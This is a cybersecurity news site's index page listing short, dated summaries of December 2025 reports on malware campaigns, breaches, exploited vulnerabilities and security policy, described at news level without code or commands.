Site Map

Comprehensive index of all cybersecurity intelligence content and resources.

Security Articles

"GhostPoster" Malware Infects 50,000+ Firefox Users via Malicious Add-ons

A stealthy malware campaign named "GhostPoster" has infected over 50,000 Mozilla Firefox users by distributing 17 malicious browser extensions. The add-ons, which masqueraded as legitimate tools like VPNs and ad blockers, have been removed from the Firefox store. The malware employed a clever technique, hiding obfuscated JavaScript within the add-on's logo image file. This code would then contact command-and-control (C2) servers to download a final payload designed for hijacking affiliate links and committing ad fraud. The campaign used evasion techniques like randomized and delayed C2 callbacks to avoid detection.

Dec 18, 2025 · 4 min read

"Scripted Sparrow" BEC Group Targets Finance Teams with Highly Structured Attacks

A disciplined and persistent Business Email Compromise (BEC) group, newly identified by Fortra as "Scripted Sparrow," has been systematically targeting corporate finance teams since at least June 2024. The group employs a structured and well-researched approach, sending highly credible phishing emails with fake invoices that impersonate professional services firms. To add legitimacy, the attackers often include forged prior email correspondence from a company executive authorizing the payment. The group utilizes a large network of US-based mule accounts for cashing out, indicating a well-organized and persistent financial threat.

Dec 18, 2025 · 4 min read

"IRLeaks" Supply Chain Attack Hits Iranian Banks, Exposing Millions of Customer Records

A major supply chain attack dubbed "IRLeaks" has resulted in a significant data breach affecting several prominent Iranian banks and millions of their customers. Attackers first compromised a third-party IT vendor in October 2025, using it as a pivot point to infiltrate the banks' networks. Over the following month, they exfiltrated vast amounts of financial data and personally identifiable information (PII), including national IDs and bank account numbers, before the breach was discovered in late November. The incident highlights the critical risks associated with third-party vendor security and inadequate patch management.

Dec 18, 2025 · 4 min read

Ransomware Evolves: "ClickFix" Social Engineering and Threat Actor Alliances on the Rise

A December 2025 threat report from NCC Group indicates that while ransomware attack volumes plateaued in November with 583 incidents, their sophistication markedly increased. Attackers are increasingly adopting the "ClickFix" (also known as ClearFake) social engineering technique, which tricks users into manually running malicious commands, bypassing many automated defenses. The report also highlights a trend of collaboration, with groups like DragonForce forming alliances with skilled affiliates from other networks. The Qilin ransomware group remained the most prolific actor, with the industrials sector and North America being the most targeted.

Dec 18, 2025 · 4 min read

"Operation ForumTroll" APT Targets Russian Academics with Plagiarism Lure

The Advanced Persistent Threat (APT) group known as Operation ForumTroll has launched a new, highly targeted phishing campaign aimed at Russian political scientists and academics. Active since at least 2022, the group's latest attack uses meticulously crafted emails impersonating a major Russian scientific library, eLibrary.ru. The emails lure victims into downloading a supposed plagiarism report, which is a ZIP archive containing a malicious .LNK file. Executing the shortcut file triggers a PowerShell script that downloads and installs the Tuoni command-and-control (C2) framework, giving the attackers remote access for espionage purposes.

Dec 18, 2025 · 4 min read

Google Investigates Malicious Code Found in Search Result Infrastructure

Google has launched an urgent investigation after cybersecurity analysts discovered anomalous, encrypted code snippets and obfuscated JavaScript embedded within its core search result payloads on December 17, 2025. The malicious code appears designed to exploit browser sandboxing vulnerabilities, which could potentially enable remote code execution or data theft on users' systems. While Google has not confirmed any user impact and states it is neutralizing the threat, the incident represents a highly sophisticated attack against critical global internet infrastructure, prompting the involvement of government agencies.

Dec 18, 2025 · 4 min read

2025: The Year Cybersecurity 'Crossed the AI Rubicon'

According to analysis published on December 14, 2025, the year 2025 represents a fundamental and irreversible turning point for the cybersecurity industry. The widespread integration of Artificial Intelligence (AI) into both offensive and defensive strategies has permanently altered the threat landscape. Key trends include the rise of 'agentic AI' capable of autonomous attacks, adaptive threats that change tactics in real-time, and a surge in highly convincing, AI-generated phishing and deepfake content. While defenders are also adopting AI, the 'great acceleration' in threat complexity is forcing a complete rethink of security playbooks.

Dec 17, 2025 · 4 min read

AI Adoption Fuels 'Massive' Cloud Attack Surface Expansion, Palo Alto Networks Report Warns

Palo Alto Networks' 2025 'State of Cloud Security Report' reveals that the rapid adoption of AI is creating an unprecedented expansion of the cloud attack surface. The study, surveying 2,800 security leaders, found that 99% of organizations have had their AI systems attacked in the last year. The use of generative AI in coding is producing insecure code faster than security teams can remediate it, creating a significant risk gap. API attacks have surged by 41% year-over-year, and lenient identity and access management (IAM) remains a top vulnerability. The report calls for a unified, platform-based approach to cloud security to counter AI-weaponized threats.

Dec 17, 2025 · 5 min read

French Interior Ministry Confirms Cyberattack Compromised Email Servers

The French Ministry of the Interior has confirmed its email servers were compromised in a cyberattack detected between December 11 and 12, 2025. Interior Minister Laurent Nuñez stated that attackers stole staff email passwords, allowing them to access an unknown number of document files. While the government is still assessing the scale, a hacker group named 'Indra' has claimed, without evidence, to have exfiltrated police files on 16.4 million citizens. In response, the ministry is rolling out two-factor authentication and resetting passwords. The attack on the high-value government target, which oversees national police and security, has raised speculation of nation-state involvement, with groups like APT28 being considered.

Dec 17, 2025 · 5 min read

New 'ConsentFix' Phishing Attack Hijacks Microsoft Accounts, Bypassing MFA via Azure CLI Abuse

A novel and sophisticated phishing attack dubbed 'ConsentFix' allows attackers to hijack Microsoft accounts without stealing passwords or bypassing multi-factor authentication (MFA). Discovered by Push Security, the browser-native attack tricks users into completing a fake verification process that involves copying a URL containing a sensitive OAuth authorization code from their browser's address bar and pasting it into the attacker's phishing page. The attacker then uses this code to authenticate as the user via the legitimate and trusted Microsoft Azure Command-Line Interface (CLI). Because the Azure CLI is a first-party app, it bypasses many consent restrictions, granting the attacker full account access. The technique is active and circumvents even phishing-resistant authentication like passkeys.

Dec 17, 2025 · 5 min read

New Zealand Launches Massive Public Alert, Warning 26,000 Citizens of Lumma Stealer Malware Infections

In a first-of-its-kind campaign, New Zealand's National Cyber Security Centre (NCSC) is emailing approximately 26,000 people to warn them of potential infection by the Lumma Stealer malware. The potent information-stealing software targets Windows devices to covertly harvest sensitive data, including passwords, browser credentials, banking details, and cryptocurrency wallets. Officials have confirmed that some of the stolen credentials were linked to government and banking systems, heightening the risk of fraud. The NCSC's mass notification directs affected individuals to a government website with instructions for malware removal and improving account security.

Dec 17, 2025 · 4 min read

MITRE Extends D3FEND Cybersecurity Framework to Operational Technology (OT)

MITRE has officially extended its D3FEND cybersecurity framework to include Operational Technology (OT), providing a standardized knowledge base of defensive techniques for cyber-physical systems. Announced on December 16, 2025, the NSA-funded initiative aims to create a common language for securing critical infrastructure in sectors like energy, manufacturing, and defense. As OT systems become increasingly connected to IT networks, D3FEND for OT provides a structured ontology of countermeasures tailored to the unique components and risks of industrial environments, mapping defensive techniques to threats against controllers, sensors, and actuators.

Dec 17, 2025 · 4 min read

'Operation MoneyMount-ISO' Phishing Campaign Deploys Phantom Stealer via Malicious ISOs

A financially motivated, Russian-language phishing campaign dubbed 'Operation MoneyMount-ISO' is actively targeting finance and accounting departments to deploy the Phantom information-stealing malware. According to researchers at Seqrite Labs, the attack uses emails with fake payment confirmations that contain a malicious ISO disk image file. This technique is designed to bypass email security controls. When the user opens the ISO, it mounts a virtual drive with a disguised executable. Running this file triggers a memory-resident infection chain that deploys Phantom Stealer, which then harvests browser credentials, crypto wallets, and other sensitive data for exfiltration.

Dec 17, 2025 · 5 min read

Storm-0249 Evolves: Access Broker Now Deploys Ransomware with Advanced Stealth Tactics

The initial access broker (IAB) known as Storm-0249 is evolving its tactics, moving beyond simply selling network access to actively participating in malware deployment. According to ReliaQuest, the group now uses more sophisticated techniques, including DLL side-loading and fileless PowerShell execution, to facilitate ransomware attacks directly. Their methods involve social engineering victims into running malicious commands (`ClickFix`), which fetch and execute PowerShell scripts from spoofed domains. A key technique is dropping a trojanized version of a SentinelOne security agent DLL to run malware under the guise of a trusted process. This evolution signifies a dangerous trend where IABs are becoming more integrated into the ransomware deployment process, increasing their threat level.

Dec 16, 2025 · 6 min read

SoundCloud and Pornhub Confirm User Data Exposure in Separate Breaches, One Via Third-Party

Both SoundCloud and Pornhub have confirmed security incidents exposing user data. SoundCloud suffered a direct breach of an ancillary service dashboard, resulting in the exfiltration of email addresses and public profile information for up to 28 million users (20% of its user base). The company states passwords and financial data were not affected. Separately, Pornhub announced that historical analytics data of some Premium members was exposed due to a breach at its former third-party analytics vendor, Mixpanel. The notorious hacking group ShinyHunters has claimed the Mixpanel breach and is attempting to extort Pornhub, alleging they stole a massive database of user search and watch history.

Dec 16, 2025 · 5 min read

CISA Orders Federal Agencies to Patch Actively Exploited Critical GeoServer XXE Flaw

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical XML External Entity (XXE) injection vulnerability in OSGeo GeoServer, CVE-2025-58360, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, which has a CVSS score up to 9.8, allows an unauthenticated remote attacker to read arbitrary files, perform Server-Side Request Forgery (SSRF) attacks, or cause a denial-of-service. Due to evidence of active exploitation, CISA has mandated that all Federal Civilian Executive Branch agencies patch the vulnerability by January 1, 2026. All organizations using the popular open-source geospatial data server are strongly urged to apply the available updates immediately.

Dec 16, 2025 · 5 min read

Active Attacks Exploit Critical Fortinet SSO Bypass Flaws to Gain Admin Access

Security firm Arctic Wolf has observed active exploitation of two critical authentication bypass vulnerabilities in Fortinet products, CVE-2025-59718 and CVE-2025-59719. Both flaws, rated 9.1 in severity, allow an unauthenticated attacker to bypass FortiCloud single sign-on (SSO) by forging a SAML message, granting them administrative access to affected devices. The attacks, observed since December 12, 2025, target the default 'admin' account. The vulnerability is present if the FortiCloud SSO feature is enabled, which can be activated automatically when registering a device. Patches are available, and administrators are urged to upgrade immediately or disable the vulnerable SSO feature.

Dec 16, 2025 · 6 min read

FreePBX Patches Critical Auth Bypass and RCE Flaws; Update VoIP Platforms Immediately

The popular open-source VoIP platform FreePBX has been updated to fix several serious security vulnerabilities, including a critical authentication bypass (CVE-2025-66039) with a 9.3 CVSS score. This flaw, present in a non-default configuration, allows an attacker to bypass the admin login and potentially achieve remote code execution. Other patched high-severity issues include multiple authenticated SQL injection flaws (CVE-2025-61675) and an arbitrary file upload bug (CVE-2025-61678). These could be chained to upload a web shell and take full control of the server. Administrators are urged to update their FreePBX instances to the latest versions to mitigate these risks.

Dec 16, 2025 · 6 min read

New 'PyStoreRAT' Malware Spreads Via Fake OSINT and AI Tools on GitHub

A new malware campaign is distributing an information-stealing Remote Access Trojan (RAT) called 'PyStoreRAT' through fake GitHub repositories. Threat actors create repositories for what appear to be legitimate OSINT, AI, or DeFi tools, artificially inflating their popularity with fake stars and forks. After gaining a user's trust, the attackers push a malicious update containing PyStoreRAT. The malware is designed to evade detection, establish persistence, and steal sensitive data, with a particular focus on cryptocurrency wallets. It can also download secondary payloads like the Rhadamanthys infostealer and propagates via USB drives, posing a significant threat to developers and security researchers.

Dec 16, 2025 · 6 min read

700Credit Data Breach Exposes PII of 5.6 Million Individuals

The U.S. fintech company 700Credit, a major provider of credit reports and data services to the automotive industry, has disclosed a data breach affecting at least 5.6 million individuals. The incident, which occurred in October 2025, resulted in an unauthorized actor gaining access to and stealing a significant amount of personally identifiable information (PII). The compromised data includes names, addresses, dates of birth, and Social Security numbers. 700Credit serves approximately 18,000 auto dealerships, and the breach involved data collected between May and October 2025. The company is providing credit monitoring services to affected individuals, and authorities are urging victims to consider credit freezes to prevent identity theft and fraud.

Dec 15, 2025 · 6 min read

New 'Gentlemen' Ransomware Group Deploys Advanced GPO and BYOVD Attacks

A new ransomware operation, identifying itself as the "Gentlemen" group, has been observed conducting double-extortion attacks against corporate networks. The group employs sophisticated techniques to achieve its objectives, including the manipulation of Group Policy Objects (GPOs) for wide-scale ransomware deployment across victim networks. Additionally, the threat actor leverages the 'Bring Your Own Vulnerable Driver' (BYOVD) technique to escalate privileges and disable or bypass endpoint security solutions. The emergence of the Gentlemen group highlights the continued evolution in ransomware tactics, combining data theft with advanced defense evasion and lateral movement strategies.

Dec 15, 2025 · 6 min read

CVSS 10.0: Atlassian Patches Critical RCE Flaw in Apache Tika Dependency

Atlassian has issued security updates for a critical vulnerability, CVE-2025-66516, in the Apache Tika parser library, a third-party dependency used in many of its products. The flaw, which carries a perfect CVSS score of 10.0, is an XML External Entity (XXE) injection vulnerability. It can be exploited by uploading a specially crafted file, such as a PDF containing a malicious XFA, potentially leading to information disclosure, server-side request forgery (SSRF), or even remote code execution (RCE). The vulnerability affects a wide range of Atlassian's server and data center products, including Jira, Confluence, and Bamboo. Customers are urged to apply the patches immediately.

Dec 15, 2025 · 6 min read

xHunt Espionage Group Returns, Targeting Kuwait with New PowerShell Backdoors

The cyber-espionage threat actor known as xHunt has resumed operations with a new campaign targeting organizations in Kuwait. Active since at least 2018, the group is focusing its latest attacks on the shipping, transportation, and government sectors. Researchers have observed xHunt infiltrating networks by targeting Microsoft Exchange and IIS web servers. Once inside, the group deploys a family of custom PowerShell-based backdoors, with tool names like 'Hisoka' and 'Netero' derived from the anime 'Hunter x Hunter'. The campaign's objective appears to be long-term intelligence collection and espionage, leveraging stealthy techniques to maintain persistence.

Dec 15, 2025 · 6 min read

New '01flip' Ransomware, Written in Rust, Targets Critical Infrastructure in APAC

A new and stealthy cross-platform ransomware strain named "01flip" has been discovered targeting critical infrastructure organizations in the Asia-Pacific region. The malware is written in the Rust programming language, enabling it to be compiled for both Windows and Linux systems and enhancing its ability to evade detection. Attackers have been observed exploiting exposed services for initial access, then deploying the open-source Sliver command-and-control (C2) framework for reconnaissance and lateral movement before executing the 01flip ransomware. The campaign highlights a growing trend of threat actors using modern, memory-safe languages like Rust to develop more sophisticated and evasive malware.

Dec 15, 2025 · 6 min read

LastPass Fined £1.2M by UK Regulator Over 2022 Security Failures

The UK's Information Commissioner's Office (ICO) has fined password manager provider LastPass £1.2 million (approximately $1.6 million) for significant security failures that led to a major data breach in 2022. The regulator found that LastPass failed to implement adequate technical and security measures to protect its users' data. The 2022 incident resulted in a threat actor gaining unauthorized access to a backup database, which contained the data of 1.6 million UK users, including encrypted password vaults. The fine highlights the serious regulatory consequences for security companies that do not meet their data protection obligations.

Dec 15, 2025 · 4 min read

India Confirms GPS Spoofing Attacks Targeted Seven Major Airports

The Indian government has officially confirmed that a series of cyber incidents involving GPS spoofing have occurred at seven of the nation's major airports. The attacks, which targeted airports in Delhi, Mumbai, Kolkata, and Bengaluru among others, disrupted navigation data for aircraft utilizing GPS-based landing procedures. Despite the signal manipulation, government officials reported that no flights were canceled or diverted. The successful handling of the incidents was attributed to the implementation of contingency measures and robust safeguards by Air Traffic Control, which allowed for safe operations using alternative navigation aids. The events underscore the growing vulnerability of critical transportation infrastructure to cyberattacks.

Dec 15, 2025 · 6 min read

Apple Rushes iOS 26.2 Update to Patch Two Actively Exploited Zero-Days

Apple has released an emergency security update, iOS 26.2 and iPadOS 26.2, to address 26 vulnerabilities. Among these are two critical zero-day flaws, CVE-2025-43529 and CVE-2025-14174, both residing in the WebKit browser engine. The company confirmed reports that these vulnerabilities have been actively exploited in sophisticated, targeted spyware campaigns, potentially allowing attackers to execute arbitrary code on unpatched devices. The update also patches a severe kernel vulnerability, CVE-2025-46285, that could grant an attacker root privileges. All iPhone and iPad users are urged to update their devices immediately.

Dec 14, 2025 · 5 min read

CISA KEV Alert: Actively Exploited RCE Flaw in Sierra Wireless Routers

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in Sierra Wireless AirLink routers, CVE-2018-4063, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, which has a CVSS score as high as 9.9, is an unrestricted file upload vulnerability that allows an authenticated attacker to achieve remote code execution (RCE). Due to evidence of active exploitation, CISA has mandated that all Federal Civilian Executive Branch (FCEB) agencies patch the vulnerability by a specified deadline, highlighting the severe risk it poses to network infrastructure.

Dec 14, 2025 · 4 min read

Germany Summons Russian Ambassador Over Suspected Air Traffic Control Cyberattack

In a significant diplomatic escalation, the German government has summoned the Russian Ambassador to Berlin following allegations of a cyberattack targeting the nation's air traffic control (ATC) systems. The incident, reported on December 13, 2025, has raised grave concerns about the security of Germany's critical national infrastructure and points towards a potential act of state-sponsored cyber-espionage or disruption. While technical details remain undisclosed, the move underscores the high stakes of cyber hostilities between Western nations and Russia.

Dec 14, 2025 · 4 min read

KillSec Ransomware Hits U.S. Financial Firm Daba Finance in Data Extortion Attack

The ransomware group known as KillSec has claimed responsibility for a cyberattack against Daba Finance Inc., a financial services company in the United States. On December 14, 2025, the group listed the company on its data leak site, employing a double-extortion tactic by threatening to release sensitive stolen data if a ransom is not paid. This incident underscores the persistent threat that data extortion gangs pose to the financial sector, which remains a high-value target due to the sensitive customer and corporate information it handles.

Dec 14, 2025 · 4 min read

WestJet Data Breach Exposes Info of 1.2 Million Passengers; Scattered Spider Suspected

Canadian airline WestJet has disclosed a significant data breach that occurred in June 2025, impacting approximately 1.2 million passengers. The compromised data includes sensitive personal information such as names, contact details, and travel documentation. While investigations are ongoing, some reports suggest the notorious Scattered Spider hacking group, known for its social engineering prowess, may be behind the attack. The breach poses a serious risk of identity theft and fraud for the affected customers.

Dec 14, 2025 · 4 min read

"Catastrophic" Data Breach at Norwegian News Agency NTB Exposes Customer Data

NTB (Norsk Telegrambyrå), Norway's leading news and content provider, has disclosed what it calls a "catastrophic" data breach that occurred in early December 2025. The company announced on December 13 that attackers exploited vulnerabilities in its systems to gain unauthorized access to its customer database, exposing sensitive personal information, detailed customer profiles, and internal communications for thousands of users. NTB is now undertaking a major overhaul of its security infrastructure in response.

Dec 14, 2025 · 3 min read

Eswatini Faces Cybersecurity Crisis as Government Fails to Act on Rising Threats

A report published on December 13, 2025, reveals a deepening cybersecurity crisis in the Kingdom of Eswatini. The nation is experiencing a significant increase in cyberattacks targeting citizens, businesses, and government bodies. This surge is compounded by a lack of effective government response, characterized by outdated laws, minimal funding for cybersecurity initiatives, a severe shortage of skilled personnel, and a failure to implement its own national cybersecurity strategy. As a result, the country's digital infrastructure remains highly vulnerable to escalating threats.

Dec 14, 2025 · 3 min read

Qilin Ransomware Gang Adds Business Services Firm B Dynamic to Leak Site

The Qilin ransomware group, a prominent ransomware-as-a-service (RaaS) operation, has listed business services company 'B Dynamic' as its latest victim on its dark web data leak site. The December 1, 2025, posting indicates that the company has suffered a network compromise and data exfiltration. By publicizing the breach, the Qilin group is employing its standard double-extortion tactic to pressure the victim into paying a ransom to prevent the public release of stolen data. This incident highlights the persistent threat from established ransomware gangs.

Dec 13, 2025 · 5 min read

Stealthy NANOREMOTE Backdoor Abuses Google Drive API for C2 Communications

A new and fully-featured Windows backdoor, dubbed NANOREMOTE, has been discovered by Elastic Security Labs. Written in C++, the malware distinguishes itself by using the Google Drive API for all command-and-control (C2) communications, allowing it to blend in with legitimate cloud traffic and evade traditional network security. The malware, which shares characteristics with the FINALDRAFT implant, is capable of reconnaissance, file transfer, and command execution. This tactic poses a significant challenge for organizations, especially those using Google Workspace, as it makes detecting malicious activity within sanctioned cloud services difficult.

Dec 13, 2025 · 5 min read

OpenAI Unveils Strategy to Manage 'High' Risk AI Cybersecurity Threats

OpenAI has announced its strategy for managing the significant cybersecurity risks posed by its increasingly powerful AI models. The company will now treat all future models as potentially 'High' risk under its Preparedness Framework, capable of automating vulnerability discovery and exploitation. Key components of the plan include forming a 'Frontier Risk Council' of external experts, creating a tiered, trusted access program for cyber defense tools, and collaborating with industry partners. The move reflects growing concerns over the potential weaponization of AI for malicious cyber operations.

Dec 13, 2025 · 3 min read

CISA Updates Cybersecurity Performance Goals for Critical Infrastructure

On December 11, CISA released an updated version of its voluntary Cybersecurity Performance Goals (CPGs), designed to help critical infrastructure operators bolster their defenses. The new version aligns with the latest NIST standards and places a stronger emphasis on governance, accountability, and risk management. The CPGs provide a baseline of measurable cybersecurity actions that organizations, including those in the healthcare sector, can take to protect against common and impactful threats, promoting a more resilient and proactive security posture.

Dec 13, 2025 · 3 min read

Makop Ransomware Evolves, Using GuLoader and New Exploits in Attacks on India

A new campaign by the Makop ransomware group is primarily targeting enterprises in India, with additional victims in Brazil and Germany. The attackers continue to use brute-force attacks against exposed RDP services for initial access. Once inside, they now use the GuLoader downloader to deliver secondary payloads like the AgentTesla and FormBook infostealers. For privilege escalation, the group is exploiting vulnerabilities like CVE-2025-7771 in the ThrottleStop driver to gain kernel-level access and disable security products before deploying the final ransomware payload.

Dec 13, 2025 · 5 min read

Google Patches Eighth Chrome Zero-Day of 2025 Under Active Attack

Google has released an emergency, out-of-band security update for its Chrome browser, patching its eighth zero-day vulnerability of 2025. The high-severity flaw, tracked as issue 466192044, is confirmed to be actively exploited in the wild. To prevent further abuse, Google has withheld technical details, but analysis suggests it may be a buffer overflow in the ANGLE graphics library. All 3.4 billion Chrome users are urged to update their browsers immediately to version 143.0.7499.109 or later.

Dec 13, 2025 · 4 min read

Conduent Breach Exposes 10.5M Patients, Ranks as 8th Largest US Healthcare Breach

Business services giant Conduent has disclosed a massive data breach that exposed the personal and medical information of over 10.5 million people, making it the 8th largest healthcare data breach in U.S. history. The breach, which was active for months between October 2024 and January 2025, has already cost the company $25 million in response efforts. The compromised data includes names, Social Security numbers, and health information, leading to multiple class-action lawsuits against the company.

Dec 12, 2025 · 5 min read

"Battering RAM": $50 Hardware Attack Cracks Intel and AMD Secure CPU Enclaves

At the Black Hat Europe 2025 conference, researchers from KU Leuven University demonstrated "Battering RAM," a novel hardware attack that completely undermines modern confidential computing technologies. Using a custom-built DDR4 interposer costing just $50, the attack can bypass the memory encryption of secure enclaves like Intel SGX and AMD SEV. This allows an attacker with physical access to read encrypted memory at runtime, extract secret keys, and defeat protections previously thought to be secure against physical threats.

Dec 12, 2025 · 5 min read

TriZetto Discloses Year-Long Data Breach Exposing Patient PHI

TriZetto Provider Solutions, a healthcare revenue management company owned by Cognizant, has started notifying clients about a major data breach. An unauthorized party had access to patient data for nearly a full year, from November 2024 until the breach was detected on October 2, 2025. The attackers accessed historical reports containing sensitive Protected Health Information (PHI), including patient names, Social Security numbers, dates of birth, and health insurance details. The cybersecurity firm Mandiant was brought in to investigate the long-running intrusion.

Dec 12, 2025 · 5 min read

Ransomware Goes Global, Targeting New Regions and Industries with Weaker Defenses

Ransomware is becoming a more globalized and unpredictable threat, according to the H2 2025 Global Threat Briefing from cyber analytics firm CyberCube. The report warns that ransomware groups are actively expanding into new geographic regions and industry sectors that have historically seen fewer attacks, often targeting those with less mature cyber defenses. The highly active LockBit ransomware-as-a-service (RaaS) group is a key driver of this trend. The findings suggest that traditional risk models based on geography or industry are becoming less reliable predictors of attack likelihood.

Dec 12, 2025 · 5 min read

NATO Sharpens Cyber Defenses in Massive "Cyber Coalition" War Game

NATO has successfully concluded its largest annual cyber defense exercise, "Cyber Coalition," in Tallinn, Estonia. The week-long event involved approximately 1,500 military and civilian personnel from 29 NATO members and seven partner nations. Participants collaborated to defend a fictional nation's critical infrastructure against a series of realistic, hybrid cyberattacks, enhancing their collective ability to respond to modern threats.

Dec 11, 2025 · 4 min read

Critical Infrastructure at Risk Due to "Deficient" OT Cybersecurity Training

A new report from Australian cybersecurity firm Secolve has exposed significant deficiencies in operational technology (OT) cybersecurity training across critical infrastructure sectors. The survey of senior professionals in industries like energy, manufacturing, and water found that training is often generic, infrequent, or completely ignored. This lack of specialized training is creating a dangerously immature security culture and leaving vital industrial environments unprepared for cyberattacks.

Dec 11, 2025 · 4 min read

Hackers Use Animated Lures and Fake Legal Warnings to Spread Malware

HP's latest Threat Insights Report reveals a significant evolution in social engineering tactics, with cybercriminals using highly convincing lures such as professional animations and fake legal warnings to trick users into downloading malware. The report highlights a campaign impersonating the Colombian Prosecutor's Office to deliver PureRAT. It also details the abuse of trusted platforms like Discord for hosting malicious payloads like the Phantom Stealer and notes the rising threat of session cookie hijacking.

Dec 11, 2025 · 4 min read

Hamas-Linked APT "Ashen Lepus" Targets Middle East with New "AshTag" Malware

The Hamas-affiliated advanced persistent threat (APT) group known as Ashen Lepus (or WIRTE) is conducting an ongoing espionage campaign targeting governmental and diplomatic entities in the Middle East. Researchers have identified a new, modular .NET malware suite named AshTag being used in these attacks. The campaign marks a significant evolution in the group's sophistication, incorporating enhanced encryption, in-memory payload execution, and the use of legitimate-looking subdomains to evade detection.

Dec 11, 2025 · 4 min read

"Operation DupeHike" Espionage Campaign Targets Russian Corporate HR Depts

A highly targeted cyber-espionage campaign, dubbed "Operation DupeHike," has been identified targeting employees in Russian corporations. Attributed to the threat actor cluster UNG0902, the campaign uses convincing social engineering lures, such as decoy documents about employee bonuses, to infiltrate networks. The primary targets are staff in HR, payroll, and administrative departments, with the goal of achieving persistent surveillance and exfiltrating sensitive corporate data.

Dec 11, 2025 · 4 min read

Unpatched Zero-Day in Gogs Git Service Actively Exploited to Gain SSH Access

A critical, unpatched zero-day vulnerability in Gogs, a popular self-hosted Git service, is being actively exploited in the wild. Tracked as CVE-2025-8110 with a CVSS score of 8.7, the flaw is a bypass of a previously patched RCE and allows an attacker to overwrite arbitrary files, ultimately leading to SSH access on the server. Researchers at Wiz have identified over 700 compromised instances, with attackers deploying the Supershell C2 framework.

Dec 11, 2025 · 4 min read

Fake Leonardo DiCaprio Movie Torrent Used as Bait to Spread Agent Tesla Trojan

Cybercriminals are luring victims with a fake torrent for a new Leonardo DiCaprio movie to distribute the Agent Tesla information-stealing trojan. Security researchers at Bitdefender analyzed the campaign, revealing a complex, multi-stage attack chain that uses a malicious .lnk shortcut, hidden batch commands in subtitle files, and multiple layers of PowerShell to execute the final payload. The malware runs only in memory and establishes persistence through a fake audio diagnostic task, making it highly evasive.

Dec 11, 2025 · 4 min read

React2Shell: Critical 10.0 CVSS RCE Flaw in React and Next.js Under Active Exploitation

A critical, unauthenticated remote code execution (RCE) vulnerability, dubbed 'React2Shell' (CVE-2025-55182), has been disclosed in React Server Components, affecting popular frameworks like Next.js. With a maximum CVSS score of 10.0, the flaw allows attackers to compromise servers with a single crafted HTTP request, requiring no user interaction. The vulnerability stems from an unsafe deserialization process in the 'Flight' protocol. Following the public disclosure on December 3, 2025, multiple weaponized proofs-of-concept became available, and active exploitation attempts by threat actors, including China-nexus groups, were observed. CISA has added CVE-2025-55182 to its Known Exploited Vulnerabilities (KEV) catalog, mandating immediate patching for federal agencies and urging all organizations to update affected components.

Dec 10, 2025 · 6 min read

Data Disaster: 4.3 Billion Records Leaked from Unprotected MongoDB Instance

One of the largest lead-generation data leaks ever recorded has been discovered by researchers from Cybernews and Bob Diachenko. An unprotected MongoDB instance, left publicly accessible without a password, exposed a staggering 4.3 billion documents, totaling 16.14 terabytes of data. The dataset contains highly detailed and structured professional and corporate intelligence, with much of the information appearing to be scraped from LinkedIn. Exposed data includes names, email addresses, phone numbers, employment history, and LinkedIn profile details. While the database was secured two days after discovery, the unknown duration of its exposure creates a significant risk of this data being used for sophisticated phishing, social engineering, and identity theft campaigns on a massive scale.

Dec 10, 2025 · 5 min read

OPSEC Fail: North Korean Spy 'Trevor Greer' Exposed by Own Infostealer Infection

In a major operational security (OPSEC) failure, a North Korean state-sponsored hacker was unmasked after accidentally infecting their own machine with commodity infostealer malware like LummaC2. The leaked logs, analyzed by Flashpoint and Hudson Rock, exposed the digital life of an operative using the persona 'Trevor Greer.' The data revealed fake identities, cryptocurrency ventures, and, most notably, a direct link to the $1.5 billion cryptocurrency heist from the exchange Bybit. The actor had registered a phishing domain, 'Bybit-assessment.com,' prior to the attack. This rare glimpse into an APT operator's personal machine highlights that even sophisticated actors make human errors, providing invaluable intelligence for defenders.

Dec 10, 2025 · 5 min read

GrayBravo MaaS Fuels Cybercrime with CastleLoader Malware

The cybercrime ecosystem is becoming more industrialized with the rise of Malware-as-a-Service (MaaS) operations like 'GrayBravo.' According to Recorded Future's Insikt Group, GrayBravo is developing and distributing a sophisticated loader called CastleLoader to at least four separate threat clusters. These clusters then use the loader to deploy various payloads, including RedLine Stealer and NetSupport RAT. The campaigns show specialization, with one group targeting the logistics sector using phishing and social engineering, while another uses Booking.com lures to target the hospitality industry. GrayBravo's operation, which features rapid development and a large infrastructure, exemplifies how MaaS providers empower less-skilled actors to launch effective and widespread attacks.

Dec 10, 2025 · 5 min read

DeadLock Ransomware Uses Vulnerable Baidu Driver to Blind EDRs

A new DeadLock ransomware campaign is leveraging a novel "Bring Your Own Vulnerable Driver" (BYOVD) loader to exploit a vulnerability (CVE-2024-51324) in a legitimate Baidu Antivirus driver, `BdApiUtil.sys`. This technique allows the threat actors to terminate any process, including endpoint detection and response (EDR) and antivirus solutions, from the kernel level. By blinding security tools, the attackers can deploy the ransomware unimpeded. The attack chain, analyzed by Cisco Talos, also involves PowerShell scripts to disable Windows Defender and delete volume shadow copies, severely hindering detection and recovery efforts.

Dec 9, 2025 · 5 min read

Code-to-Cloud Attacks: Leaked GitHub Tokens Become Keys to the Kingdom

Security researchers at Wiz have detailed an emerging "code-to-cloud" attack vector where threat actors leverage compromised GitHub Personal Access Tokens (PATs) to pivot from code repositories directly into production cloud environments. By abusing the trust between GitHub and connected Cloud Service Providers (CSPs), attackers with even basic read permissions can discover secret names, then use write permissions to execute malicious GitHub Actions that exfiltrate CSP credentials. The attack is particularly stealthy as API calls to search for secret names are not logged by GitHub Enterprise, creating a major visibility gap for defenders.

Dec 9, 2025 · 6 min read

New 'Broadside' Botnet Exploits DVRs to Target Maritime Logistics

A new, sophisticated variant of the Mirai botnet, dubbed "Broadside," is actively exploiting a command injection vulnerability (CVE-2024-3721) in TBK Digital Video Recorder (DVR) devices. According to research from Cydome, the campaign specifically targets the maritime logistics sector, where these DVRs are common. Broadside is more advanced than typical Mirai variants, using stealthier techniques and a custom C2 protocol. Crucially, its goals extend beyond DDoS to include credential harvesting and lateral movement, turning compromised DVRs into strategic footholds on vessel networks.

Dec 9, 2025 · 6 min read

AI Threat Hunting Exposes 'GhostPenguin,' a Linux Backdoor Undetected for Months

